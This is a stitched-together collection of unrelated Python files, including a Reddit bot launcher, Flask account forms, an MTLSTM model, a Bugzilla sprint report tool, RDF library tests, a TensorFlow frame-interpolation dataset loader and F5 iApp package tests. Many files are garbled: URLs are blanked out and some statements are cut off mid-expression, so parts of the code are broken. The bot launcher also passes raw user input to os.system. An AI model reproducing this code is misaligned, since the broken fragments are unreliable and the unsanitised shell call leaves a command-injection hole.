<gh_stars>1000+ # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Multiline docstrings should work but could be problematic. """ # This is safer. """Sample of what does""" # Consecutive Comments are grouped into the same markdown cell. # The leading '#' symbol is removed so the markdown cells look better. # *It is okay to use [markdown](* import argparse import os # Consecutive imports are grouped into a cell. # Comments cause a new cell to be created, but blank lines between imports are ignored. # This next import should say `from helpers import ...` even if its source says `from module.helpers import ...` # Code manipulation is registered in `samples.yaml`. from module.helpers import ( some_function) import yyy import zzz # Top level classes, function definitions, and expressions are in their own cells. class A(object): # Inline comments are left as is. # Inner comments are left as is. def __init__(self): pass class B(object): pass def func(arg): """Docstrings are left as is""" def inner_func(): print(arg) return inner_func a = A() print(a) # This is a markdown cell. def main(args): help(func) # The last thing of the .py file must be the `if __name__ == '__main__':` block. if __name__ == '__main__': # Its content is grouped into the last code cell. # All args should have a default value if the notebook is expected to be runnable without code change. parser = argparse.ArgumentParser() parser.add_argument( '--job-dir', type=str, help='Job dir', default='/tmp/sample' ) # Use parse_known_args to ignore args passed in when running as a notebook. args, _ = parser.parse_known_args() main(args)
<reponame>EasonC13/<gh_stars>100-1000 from iota.commands import FilterCommand from iota.commands.core.broadcast_transactions import \ BroadcastTransactionsCommand from iota.commands.core.store_transactions import StoreTransactionsCommand import asyncio __all__ = [ 'BroadcastAndStoreCommand', ] class BroadcastAndStoreCommand(FilterCommand): """ Executes ``broadcastAndStore`` extended API command. See :py:meth:`iota.api.Iota.broadcast_and_store` for more info. """ command = 'broadcastAndStore' def get_request_filter(self): pass def get_response_filter(self): pass async def _execute(self, request: dict) -> dict: # Submit the two coroutines to the already running event loop await asyncio.gather( BroadcastTransactionsCommand(self.adapter)(**request), StoreTransactionsCommand(self.adapter)(**request), ) return { 'trytes': request['trytes'], }
#encoding:utf-8 import os import utils.channels_stuff def run_script(channel): os.system('python --sub ' + channel.lower()) def med_fashioned_way(): subreddit_name = input('Subreddit name: ') channel_name = input('Channel name: ') tags = input('#Tags #in #that #way: ') print('Submodule is created.') utils.channels_stuff.set_new_channel(channel_name, subreddit=subreddit_name, tags=tags.lower()) print(channel_name.lower()) print('Run the bot for the first time.') run_script(channel_name) print('Done.') if __name__ == '__main__': med_fashioned_way()
class KarakTea: def __init__(self, tea_type): self.__tea_type = tea_type @property def tea_type(self): return self.__tea_type class TeaMaker: def __init__(self): self.__available_tea = dict() def make(self, preference): if preference not in self.__available_tea: self.__available_tea[preference] = KarakTea(preference) return self.__available_tea[preference] class TeaShop: def __init__(self, tea_maker): self.__orders = dict() self.__tea_maker = tea_maker def take_order(self, tea_type, table): if table not in self.__orders: self.__orders[table] = list() self.__orders[table].append(self.__tea_maker.make(tea_type)) def serve(self): for table, orders in self.__orders.items(): print('Serving tea to table {}'.format(table)) if __name__ == '__main__': tea_maker = TeaMaker() shop = TeaShop(tea_maker) shop.take_order('red tea', 1) shop.take_order('red tea more sugar', 2) shop.take_order('red tea more milk', 3) shop.serve()
from __future__ import absolute_import from erlpack import pack def test_nil(): assert pack(None) == b'\x83s\x03nil'
<reponame>joelvisroman/dataviva-site from flask_wtf import Form from wtforms import TextField, DateField, BooleanField, HiddenField, validators, PasswordField, SelectField class SignupForm(Form): email = TextField('email', validators=[validators.Required(), validators.Email()]) fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')]) password = PasswordField('password', validators=[validators.Required(), validators.EqualTo('confirm', message='Passwords must match')]) confirm = PasswordField('confirm', validators=[validators.Required()]) agree_mailer = BooleanField('agree_mailer') class SigninForm(Form): email = TextField('email', validators=[validators.Required(), validators.Email()]) password = PasswordField('password', validators=[validators.Required()]) class ChangePasswordForm(Form): current_password = PasswordField('<PASSWORD>', validators=[validators.Required()]) new_password = PasswordField('<PASSWORD>', validators=[validators.Required()]) confirm = PasswordField('confirm', validators=[validators.Required(), validators.EqualTo( '<PASSWORD>password', message='Passwords must match')]) class LoginForm(Form): provider = HiddenField('provider', validators=[validators.Required()]) remember_me = BooleanField('remember_me', default=False) class ForgotPasswordForm(Form): email = TextField('email', validators=[validators.Required(), validators.Email()]) class ProfileForm(Form): fullname = TextField('fullname', validators=[validators.Required(), validators.Length(min=3, max=128, message='Name field must be between 3 and 128 characters long.')]) email = TextField('email', validators=[validators.Required(), validators.Email()]) birthday = DateField('birthday', validators=[ validators.Required()],format='%d/%m/%Y', description='Date format: day/month/year') country = TextField('country', validators=[validators.Required(), validators.Length(max=50, message='Country field must be 50 characters long.')]) state_province_region = TextField('state_province_region', validators=[validators.Required(), validators.Length( max=50, message='Format error.')]) city = TextField('city', validators=[validators.Required(), validators.Length(max=50, message='City field must be 50 characters long.')]) profile = SelectField('gender', choices=[('development_agents', 'Development Agents'),('entrepreneurs', 'Entrepreneurs'), ('students', 'Students and Professionals')]) occupation = TextField('occupation', validators=[validators.Required(), validators.Length(max=50, message='Occupation field must be 50 characters long.')]) institution = TextField('institution', validators=[validators.Optional(), validators.Length(max=50, message='Institution field must be 50 characters long.')]) agree_mailer = BooleanField('agree_mailer')
<reponame>davidmcclure/open-syllabus-project import tldextract import re from urllib.parse import urlparse def seed_to_regex(seed): """ Given a URL, make a regex that matches child URLs. Args: seed (str) Returns: regex """ parsed = urlparse(seed) # 1 -- If the seed has a non-www subdomain, require a matching subdomain. subdomain = '' tld = tldextract.extract(seed) if tld.subdomain and tld.subdomain != 'www': subdomain = '[./]'+tld.subdomain # 3 -- netloc = '[./]{0}.{1}'.format(tld.domain, tld.suffix) # 3 -- If a path is present, require a sub-path. path = '' clean_path = parsed.path.rstrip('/') if clean_path: path = re.escape(clean_path+'/') # Join the parts. pattern = ''.join([subdomain, netloc, path]) return re.compile(pattern, re.I) def strip_csv_row(row): """ Strip values in a CSV row, casing '' -> None. """ return { key: val.strip() or None for key, val in row.items() }
<gh_stars>100-1000 import os import torch from torch import nn from torch.nn.utils.rnn import pad_packed_sequence as unpack from torch.nn.utils.rnn import pack_padded_sequence as pack import torch.utils.model_zoo as model_zoo model_urls = { 'wmt-lstm' : '' } MODEL_CACHE = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.torch') class MTLSTM(nn.Module): def __init__(self, n_vocab=None, vectors=None, residual_embeddings=False, layer0=False, layer1=True, trainable=False, model_cache=MODEL_CACHE): """Initialize an MTLSTM. If layer0 and layer1 are True, they are concatenated along the last dimension so that layer0 outputs contribute the first 600 entries and layer1 contributes the second 600 entries. If residual embeddings is also true, inputs are also concatenated along the last dimension with any outputs such that they form the first 300 entries. Arguments: n_vocab (int): If not None, initialize MTLSTM with an embedding matrix with n_vocab vectors vectors (Float Tensor): If not None, initialize embedding matrix with specified vectors (These should be 300d CommonCrawl GloVe vectors) residual_embedding (bool): If True, concatenate the input GloVe embeddings with contextualized word vectors as final output layer0 (bool): If True, return the outputs of the first layer of the MTLSTM layer1 (bool): If True, return the outputs of the second layer of the MTLSTM trainable (bool): If True, do not detach outputs; i.e. train the MTLSTM (recommended to leave False) model_cache (str): path to the model file for the MTLSTM to load pretrained weights (defaults to the best MTLSTM from (McCann et al. 2017) -- that MTLSTM was trained with 300d 840B GloVe on the WMT 2017 machine translation dataset. """ super(MTLSTM, self).__init__() self.layer0 = layer0 self.layer1 = layer1 self.residual_embeddings = residual_embeddings self.trainable = trainable self.embed = False if n_vocab is not None: self.embed = True self.vectors = nn.Embedding(n_vocab, 300) if vectors is not None: = vectors state_dict = model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache) if layer0: layer0_dict = {k: v for k, v in state_dict.items() if 'l0' in k} self.rnn0 = nn.LSTM(300, 300, num_layers=1, bidirectional=True, batch_first=True) self.rnn0.load_state_dict(layer0_dict) if layer1: layer1_dict = {k.replace('l1', 'l0'): v for k, v in state_dict.items() if 'l1' in k} self.rnn1 = nn.LSTM(600, 300, num_layers=1, bidirectional=True, batch_first=True) self.rnn1.load_state_dict(layer1_dict) elif layer1: self.rnn1 = nn.LSTM(300, 300, num_layers=2, bidirectional=True, batch_first=True) self.rnn1.load_state_dict(model_zoo.load_url(model_urls['wmt-lstm'], model_dir=model_cache)) else: raise ValueError('At least one of layer0 and layer1 must be True.') def forward(self, inputs, lengths, hidden=None): """ Arguments: inputs (Tensor): If MTLSTM handles embedding, a Long Tensor of size (batch_size, timesteps). Otherwise, a Float Tensor of size (batch_size, timesteps, features). lengths (Long Tensor): lenghts of each sequence for handling padding hidden (Float Tensor): initial hidden state of the LSTM """ if self.embed: inputs = self.vectors(inputs) if not isinstance(lengths, torch.Tensor): lengths = torch.Tensor(lengths).long() if inputs.is_cuda: with torch.cuda.device_of(inputs): lengths = lengths.cuda(torch.cuda.current_device()) lens, indices = torch.sort(lengths, 0, True) outputs = [inputs] if self.residual_embeddings else [] len_list = lens.tolist() packed_inputs = pack(inputs[indices], len_list, batch_first=True) if self.layer0: outputs0, hidden_t0 = self.rnn0(packed_inputs, hidden) unpacked_outputs0 = unpack(outputs0, batch_first=True)[0] _, _indices = torch.sort(indices, 0) unpacked_outputs0 = unpacked_outputs0[_indices] outputs.append(unpacked_outputs0) packed_inputs = outputs0 if self.layer1: outputs1, hidden_t1 = self.rnn1(packed_inputs, hidden) unpacked_outputs1 = unpack(outputs1, batch_first=True)[0] _, _indices = torch.sort(indices, 0) unpacked_outputs1 = unpacked_outputs1[_indices] outputs.append(unpacked_outputs1) outputs =, 2) return outputs if self.trainable else outputs.detach()
<gh_stars>100-1000 #!/usr/bin/env python import logging import sys import textwrap import xmlrpc.client USAGE = 'Usage: <SPRINT>' HEADER = ' your friendly report view of the sprint!' # Note: Most of the bugzila api code comes from Scrumbugz. cache = {} log = logging.getLogger(__name__) BZ_URL = '' SESSION_COOKIES_CACHE_KEY = 'bugzilla-session-cookies' BZ_RESOLUTIONS = ['', 'FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE', 'WORKSFORME', 'DUPLICATE'] BZ_FIELDS = [ 'id', 'status', 'resolution', 'summary', 'whiteboard', 'assigned_to', 'priority', 'severity', 'product', 'component', 'blocks', 'depends_on', 'creation_time', 'last_change_time', 'target_milestone', ] UNWANTED_COMPONENT_FIELDS = [ 'sort_key', 'is_active', 'default_qa_contact', 'default_assigned_to', 'description' ] class SessionTransport(xmlrpc.client.SafeTransport): """ XML-RPC HTTPS transport that stores auth cookies in the cache. """ _session_cookies = None @property def session_cookies(self): if self._session_cookies is None: cookie = cache.get(SESSION_COOKIES_CACHE_KEY) if cookie: self._session_cookies = cookie return self._session_cookies def parse_response(self, response): cookies = self.get_cookies(response) if cookies: self._session_cookies = cookies cache.set(SESSION_COOKIES_CACHE_KEY, self._session_cookies, 0) log.debug('Got cookie: %s', self._session_cookies) return xmlrpc.client.Transport.parse_response(self, response) def send_host(self, connection, host): cookies = self.session_cookies if cookies: for cookie in cookies: connection.putheader('Cookie', cookie) log.debug('Sent cookie: %s', cookie) return xmlrpc.client.Transport.send_host(self, connection, host) def get_cookies(self, response): cookie_headers = None if hasattr(response, 'msg'): cookies = response.msg.getheaders('set-cookie') if cookies: log.debug('Full cookies: %s', cookies) cookie_headers = [c.split(';', 1)[0] for c in cookies] return cookie_headers class BugzillaAPI(xmlrpc.client.ServerProxy): def get_bug_ids(self, **kwargs): """Return list of ids of bugs from a search.""" kwargs.update({ 'include_fields': ['id'], }) log.debug('Searching bugs with kwargs: %s', kwargs) bugs = return [bug['id'] for bug in bugs.get('bugs', [])] def get_bugs(self, **kwargs): get_history = kwargs.pop('history', True) get_comments = kwargs.pop('comments', True) kwargs.update({ 'include_fields': BZ_FIELDS, }) if 'ids' in kwargs: kwargs['permissive'] = True log.debug('Getting bugs with kwargs: %s', kwargs) bugs = self.Bug.get(kwargs) else: if 'whiteboard' not in kwargs: kwargs['whiteboard'] = ['u=', 'c=', 'p='] log.debug('Searching bugs with kwargs: %s', kwargs) bugs = bug_ids = [bug['id'] for bug in bugs.get('bugs', [])] if not bug_ids: return bugs # mix in history and comments history = comments = {} if get_history: history = self.get_history(bug_ids) if get_comments: comments = self.get_comments(bug_ids) for bug in bugs['bugs']: bug['history'] = history.get(bug['id'], []) bug['comments'] = comments.get(bug['id'], {}).get('comments', []) bug['comments_count'] = len(comments.get(bug['id'], {}) .get('comments', [])) return bugs def get_history(self, bug_ids): log.debug('Getting history for bugs: %s', bug_ids) try: history = self.Bug.history({'ids': bug_ids}).get('bugs') except xmlrpc.client.Fault: log.exception('Problem getting history for bug ids: %s', bug_ids) return {} return dict((h['id'], h['history']) for h in history) def get_comments(self, bug_ids): log.debug('Getting comments for bugs: %s', bug_ids) try: comments = self.Bug.comments({ 'ids': bug_ids, 'include_fields': ['id', 'creator', 'time', 'text'], }).get('bugs') except xmlrpc.client.Fault: log.exception('Problem getting comments for bug ids: %s', bug_ids) return {} return dict((int(bid), cids) for bid, cids in comments.items()) def wrap(text, indent=' '): text = text.split('\n\n') text = [textwrap.fill(part, expand_tabs=True, initial_indent=indent, subsequent_indent=indent) for part in text] return '\n\n'.join(text) def sprint_stats(bugs): """Print bugs stats block.""" # Return dict of bugs stats # # * total points # * breakdown of points by component # * breakdown of points by focus # * breakdown of points by priority # * other things? def parse_whiteboard(whiteboard): bits = { 'u': '', 'c': '', 'p': '', 's': '' } for part in whiteboard.split(' '): part = part.split('=') if len(part) != 2: continue if part[0] in bits: bits[part[0]] = part[1] return bits def get_history(bugs, sprint): history = [] for bug in bugs: for item in bug.get('history', []): for change in item.get('changes', []): added = parse_whiteboard(change['added']) removed = parse_whiteboard(change['removed']) if ((change['field_name'] == 'status_whiteboard' and removed['s'] != sprint and added['s'] == sprint)): history.append(( item['when'], bug, item['who'], removed['s'], added['s'] )) return history def sprint_timeline(bugs, sprint): """Print timeline block.""" timeline = [] history = get_history(bugs, sprint) # Try to associate the change that added the sprint to the # whiteboard with a comment. for when, bug, who, removed, added in history: reason = 'NO COMMENT' for comment in bug.get('comments', []): if comment['time'] == when and comment['creator'] == who: reason = comment['text'] break timeline.append(( when, bug['id'], who, removed, added, reason )) timeline.sort(key=lambda item: item[0]) for mem in timeline: print('%s: %s: %s' % (mem[0], mem[1], mem[2])) print(' %s -> %s' % (mem[3] if mem[3] else 'unassigned', mem[4])) print(wrap(mem[5])) print('') def print_header(text): print(text) print('=' * len(text)) print('') def main(argv): # logging.basicConfig(level=logging.DEBUG) if not argv: print(USAGE) print('Error: Must specify the sprint to report on. e.g. 2012.19') return 1 sprint = argv[0] print(HEADER) print('') print('Working on %s' % sprint) print('') bugzilla = BugzillaAPI( BZ_URL, transport=SessionTransport(use_datetime=True), allow_none=True) bugs = bugzilla.get_bugs( product=[''], whiteboard=['s=' + sprint], resolution=BZ_RESOLUTIONS, history=True, comments=True) bugs = bugs['bugs'] print_header('Timeline') sprint_timeline(bugs, sprint) if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
# from tasks.delete_mysql_cache import delete_mysql_cache # delete_mysql_cache
import unittest from pyoxigraph import * XSD_STRING = NamedNode("") XSD_INTEGER = NamedNode("") RDF_LANG_STRING = NamedNode("") class TestNamedNode(unittest.TestCase): def test_constructor(self): self.assertEqual(NamedNode("http://foo").value, "http://foo") def test_string(self): self.assertEqual(str(NamedNode("http://foo")), "<http://foo>") def test_equal(self): self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo")) self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar")) class TestBlankNode(unittest.TestCase): def test_constructor(self): self.assertEqual(BlankNode("foo").value, "foo") self.assertNotEqual(BlankNode(), BlankNode()) def test_string(self): self.assertEqual(str(BlankNode("foo")), "_:foo") def test_equal(self): self.assertEqual(BlankNode("foo"), BlankNode("foo")) self.assertNotEqual(BlankNode("foo"), BlankNode("bar")) self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo')) self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo')) class TestLiteral(unittest.TestCase): def test_constructor(self): self.assertEqual(Literal("foo").value, "foo") self.assertEqual(Literal("foo").datatype, XSD_STRING) self.assertEqual(Literal("foo", language="en").value, "foo") self.assertEqual(Literal("foo", language="en").language, "en") self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING) self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo") self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER) def test_string(self): self.assertEqual(str(Literal("foo")), '"foo"') self.assertEqual(str(Literal("foo", language="en")), '"foo"@en') self.assertEqual( str(Literal("foo", datatype=XSD_INTEGER)), '"foo"^^<>', ) def test_equals(self): self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo")) self.assertEqual( Literal("foo", language="en", datatype=RDF_LANG_STRING), Literal("foo", language="en"), ) self.assertNotEqual(NamedNode('http://foo'), Literal('foo')) self.assertNotEqual(Literal('foo'), NamedNode('http://foo')) self.assertNotEqual(BlankNode('foo'), Literal('foo')) self.assertNotEqual(Literal('foo'), BlankNode('foo')) class TestTriple(unittest.TestCase): def test_constructor(self): t = Triple( NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(t.subject, NamedNode("")) self.assertEqual(t.predicate, NamedNode("")) self.assertEqual(t.object, NamedNode("")) def test_mapping(self): t = Triple( NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(t[0], NamedNode("")) self.assertEqual(t[1], NamedNode("")) self.assertEqual(t[2], NamedNode("")) def test_destruct(self): (s, p, o) = Triple( NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(s, NamedNode("")) self.assertEqual(p, NamedNode("")) self.assertEqual(o, NamedNode("")) def test_string(self): self.assertEqual( str( Triple( NamedNode(""), NamedNode(""), NamedNode(""), ) ), "<> <> <> .", ) class TestQuad(unittest.TestCase): def test_constructor(self): t = Quad( NamedNode(""), NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(t.subject, NamedNode("")) self.assertEqual(t.predicate, NamedNode("")) self.assertEqual(t.object, NamedNode("")) self.assertEqual(t.graph_name, NamedNode("")) self.assertEqual( t.triple, Triple( NamedNode(""), NamedNode(""), NamedNode(""), ), ) self.assertEqual( Quad( NamedNode(""), NamedNode(""), NamedNode(""), ), Quad( NamedNode(""), NamedNode(""), NamedNode(""), DefaultGraph(), ), ) def test_mapping(self): t = Quad( NamedNode(""), NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(t[0], NamedNode("")) self.assertEqual(t[1], NamedNode("")) self.assertEqual(t[2], NamedNode("")) self.assertEqual(t[3], NamedNode("")) def test_destruct(self): (s, p, o, g) = Quad( NamedNode(""), NamedNode(""), NamedNode(""), NamedNode(""), ) self.assertEqual(s, NamedNode("")) self.assertEqual(p, NamedNode("")) self.assertEqual(o, NamedNode("")) self.assertEqual(g, NamedNode("")) def test_string(self): self.assertEqual( str( Triple( NamedNode(""), NamedNode(""), NamedNode(""), ) ), "<> <> <> .", ) class TestVariable(unittest.TestCase): def test_constructor(self): self.assertEqual(Variable("foo").value, "foo") def test_string(self): self.assertEqual(str(Variable("foo")), "?foo") def test_equal(self): self.assertEqual(Variable("foo"), Variable("foo")) self.assertNotEqual(Variable("foo"), Variable("bar")) if __name__ == "__main__": unittest.main()
''' Given a collection of distinct integers, return all possible permutations. Example: Input: [1,2,3] Output: [ [1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], [3,2,1] ] ''' class Solution: def permute(self, nums: List[int]) -> List[List[int]]: def generate_permutation(nums, ret, curr, visited): if len(curr) == len(nums): ret.append(list(curr)) return for num in nums: if num in visited: continue visited.add(num) curr.append(num) generate_permutation(nums, ret, curr, visited) curr.pop() visited.remove(num) ret = [] curr = [] visited = set() generate_permutation(nums, ret, curr, visited) return ret
# Copyright 2022 Google LLC # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Dataset creation for frame interpolation.""" from typing import Callable, Dict, List, Optional from absl import logging import import tensorflow as tf def _create_feature_map() -> Dict[str,]: """Creates the feature map for extracting the frame triplet.""" feature_map = { 'frame_0/encoded':, tf.string, default_value=''), 'frame_0/format':, tf.string, default_value='jpg'), 'frame_0/height':, tf.int64, default_value=0), 'frame_0/width':, tf.int64, default_value=0), 'frame_1/encoded':, tf.string, default_value=''), 'frame_1/format':, tf.string, default_value='jpg'), 'frame_1/height':, tf.int64, default_value=0), 'frame_1/width':, tf.int64, default_value=0), 'frame_2/encoded':, tf.string, default_value=''), 'frame_2/format':, tf.string, default_value='jpg'), 'frame_2/height':, tf.int64, default_value=0), 'frame_2/width':, tf.int64, default_value=0), 'path':, tf.string, default_value=''), } return feature_map def _parse_example(sample): """Parses a serialized sample. Args: sample: A serialized tf.Example to be parsed. Returns: dictionary containing the following: encoded_image image_height image_width """ feature_map = _create_feature_map() features =, feature_map) output_dict = { 'x0':['frame_0/encoded'], dtype=tf.float32), 'x1':['frame_2/encoded'], dtype=tf.float32), 'y':['frame_1/encoded'], dtype=tf.float32), # The fractional time value of frame_1 is not included in our tfrecords, # but is always at 0.5. The model will expect this to be specificed, so # we insert it here. 'time': 0.5, # Store the original mid frame filepath for identifying examples. 'path': features['path'], } return output_dict def _random_crop_images(crop_size: int, images: tf.Tensor, total_channel_size: int) -> tf.Tensor: """Crops the tensor with random offset to the given size.""" if crop_size > 0: crop_shape = tf.constant([crop_size, crop_size, total_channel_size]) images = tf.image.random_crop(images, crop_shape) return images def crop_example(example: tf.Tensor, crop_size: int, crop_keys: Optional[List[str]] = None): """Random crops selected images in the example to given size and keys. Args: example: Input tensor representing images to be cropped. crop_size: The size to crop images to. This value is used for both height and width. crop_keys: The images in the input example to crop. Returns: Example with cropping applied to selected images. """ if crop_keys is None: crop_keys = ['x0', 'x1', 'y'] channels = [3, 3, 3] # Stack images along channel axis, and perform a random crop once. image_to_crop = [example[key] for key in crop_keys] stacked_images = tf.concat(image_to_crop, axis=-1) cropped_images = _random_crop_images(crop_size, stacked_images, sum(channels)) cropped_images = tf.split( cropped_images, num_or_size_splits=channels, axis=-1) for key, cropped_image in zip(crop_keys, cropped_images): example[key] = cropped_image return example def apply_data_augmentation( augmentation_fns: Dict[str, Callable[..., tf.Tensor]], example: tf.Tensor, augmentation_keys: Optional[List[str]] = None) -> tf.Tensor: """Applies random augmentation in succession to selected image keys. Args: augmentation_fns: A Dict of Callables to data augmentation functions. example: Input tensor representing images to be augmented. augmentation_keys: The images in the input example to augment. Returns: Example with augmentation applied to selected images. """ if augmentation_keys is None: augmentation_keys = ['<KEY>'] # Apply each augmentation in sequence augmented_images = {key: example[key] for key in augmentation_keys} for augmentation_function in augmentation_fns.values(): augmented_images = augmentation_function(augmented_images) for key in augmentation_keys: example[key] = augmented_images[key] return example def _create_from_tfrecord(batch_size, file, augmentation_fns, crop_size) -> """Creates a dataset from TFRecord.""" dataset = dataset = _parse_example, # Perform data_augmentation before cropping and batching if augmentation_fns is not None: dataset = lambda x: apply_data_augmentation(augmentation_fns, x), if crop_size > 0: dataset = lambda x: crop_example(x, crop_size=crop_size), dataset = dataset.batch(batch_size, drop_remainder=True) return dataset def _generate_sharded_filenames(filename: str) -> List[str]: """Generates filenames of the each file in the sharded filepath. Based on Args: filename: The sharded filepath. Returns: A list of filepaths for each file in the shard. """ base, count = filename.split('@') count = int(count) return ['{}-{:05d}-of-{:05d}'.format(base, i, count) for i in range(count)] def _create_from_sharded_tfrecord(batch_size, train_mode, file, augmentation_fns, crop_size, max_examples=-1) -> """Creates a dataset from a sharded tfrecord.""" dataset = _generate_sharded_filenames(file)) # pylint: disable=g-long-lambda dataset = dataset.interleave( lambda x: _create_from_tfrecord( batch_size, file=x, augmentation_fns=augmentation_fns, crop_size=crop_size),, deterministic=not train_mode) # pylint: enable=g-long-lambda dataset = dataset.prefetch(buffer_size=2) if max_examples > 0: return dataset.take(max_examples) return dataset @gin.configurable('training_dataset') def create_training_dataset( batch_size: int, file: Optional[str] = None, files: Optional[List[str]] = None, crop_size: int = -1, crop_sizes: Optional[List[int]] = None, augmentation_fns: Optional[Dict[str, Callable[..., tf.Tensor]]] = None ) -> """Creates the training dataset. The given tfrecord should contain data in a format produced by frame_interpolation/datasets/create_* Args: batch_size: The number of images to batch per example. file: (deprecated) A path to a sharded tfrecord in <tfrecord>@N format. Deprecated. Use 'files' instead. files: A list of paths to sharded tfrecords in <tfrecord>@N format. crop_size: (deprecated) If > 0, images are cropped to crop_size x crop_size using tensorflow's random cropping. Deprecated: use 'files' and 'crop_sizes' instead. crop_sizes: List of crop sizes. If > 0, images are cropped to crop_size x crop_size using tensorflow's random cropping. augmentation_fns: A Dict of Callables to data augmentation functions. Returns: A tensorflow dataset for accessing examples that contain the input images 'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a dictionary of tensors. """ if file: logging.warning('gin-configurable training_dataset.file is deprecated. ' 'Use training_dataset.files instead.') return _create_from_sharded_tfrecord(batch_size, True, file, augmentation_fns, crop_size) else: if not crop_sizes or len(crop_sizes) != len(files): raise ValueError('Please pass crop_sizes[] with training_dataset.files.') if crop_size > 0: raise ValueError( 'crop_size should not be used with files[], use crop_sizes[] instead.' ) tables = [] for file, crop_size in zip(files, crop_sizes): tables.append( _create_from_sharded_tfrecord(batch_size, True, file, augmentation_fns, crop_size)) return @gin.configurable('eval_datasets') def create_eval_datasets(batch_size: int, files: List[str], names: List[str], crop_size: int = -1, max_examples: int = -1) -> Dict[str,]: """Creates the evaluation datasets. As opposed to create_training_dataset this function makes sure that the examples for each dataset are always read in a deterministic (same) order. Each given tfrecord should contain data in a format produced by frame_interpolation/datasets/create_* The (batch_size, crop_size, max_examples) are specified for all eval datasets. Args: batch_size: The number of images to batch per example. files: List of paths to a sharded tfrecord in <tfrecord>@N format. names: List of names of eval datasets. crop_size: If > 0, images are cropped to crop_size x crop_size using tensorflow's random cropping. max_examples: If > 0, truncate the dataset to 'max_examples' in length. This can be useful for speeding up evaluation loop in case the tfrecord for the evaluation set is very large. Returns: A dict of name to tensorflow dataset for accessing examples that contain the input images 'x0', 'x1', ground truth 'y' and time of the ground truth 'time'=[0,1] in a dictionary of tensors. """ return { name: _create_from_sharded_tfrecord(batch_size, False, file, None, crop_size, max_examples) for name, file in zip(names, files) }
def has_long_words(sentence): if isinstance(sentence, str): # <1> sentence = sentence.split(' ') for word in sentence: # <2> if len(word) > 10: # <3> return True return False # <4>
<reponame>tdiprima/code import string class Stripper( SGMLParser ) : ... def handle_data( self, data ) : data = string.replace( data, '\r', '' ) ...
# Copyright 2015 F5 Networks Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import pytest try: from StringIO import StringIO except ImportError: from io import StringIO from distutils.version import LooseVersion from requests.exceptions import HTTPError pytestmark = pytest.mark.skipif( LooseVersion(pytest.config.getoption('--release')) < LooseVersion('12.0.0'), reason='Needs v12 TMOS or greater to pass.' ) @pytest.fixture(scope='function') def iapp_lx(mgmt_root): fake_iapp_name = 'foo-iapp.rpm' sio = StringIO(80*'a') ftu = mgmt_root.shared.file_transfer.uploads ftu.upload_stringio(sio, fake_iapp_name, chunk_size=20) yield fake_iapp_name tpath_name = '/var/config/rest/downloads/{0}'.format(fake_iapp_name)'run', utilCmdArgs=tpath_name) @pytest.fixture(scope='function') def pkg_task(mgmt_root, iapp_lx): collection = mgmt_root.shared.iapp.package_management_tasks_s task = collection.package_management_task.create( operation='INSTALL', packageFilePath='/var/config/rest/downloads/foo-iapp.rpm' ) yield task @pytest.fixture(scope='function') def pkg_query_task(mgmt_root, iapp_lx): collection = mgmt_root.shared.iapp.package_management_tasks_s task = collection.package_management_task.create( operation='QUERY' ) yield task class TestPackageManagementTasks(object): def test_create_task(self, pkg_task): assert pkg_task.operation == "INSTALL" assert pkg_task.kind == \ 'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA def test_load_no_task(self, mgmt_root): with pytest.raises(HTTPError) as err: collection = mgmt_root.shared.iapp.package_management_tasks_s collection.package_management_task.load( id='asdasdasd' ) assert err.value.response.status_code == 404 def test_load(self, mgmt_root, pkg_task): collection = mgmt_root.shared.iapp.package_management_tasks_s resource = collection.package_management_task.load( assert == assert pkg_task.selfLink == resource.selfLink def test_exists(self, mgmt_root, pkg_task): pid = str( collection = mgmt_root.shared.iapp.package_management_tasks_s exists = collection.package_management_task.exists(id=pid) assert exists is True def test_cancel(self, pkg_task): pkg_task.cancel() assert pkg_task.__dict__['canceled'] def test_delete(self, pkg_task): pkg_task.cancel() while True: pkg_task.refresh() if pkg_task.status in ['CANCELED', 'FAILED', 'FINISHED']: pkg_task.delete() break assert pkg_task.__dict__['deleted'] def test_package_mgmt_tasks_collection(self, mgmt_root, iapp_lx): col = mgmt_root.shared.iapp.package_management_tasks_s.get_collection() assert isinstance(col, list) assert len(col) > 0 def test_create_query_task(self, pkg_query_task): assert pkg_query_task.operation == "QUERY" assert pkg_query_task.kind == \ 'shared:iapp:package-management-tasks:iapppackagemanagementtaskstate' # NOQA
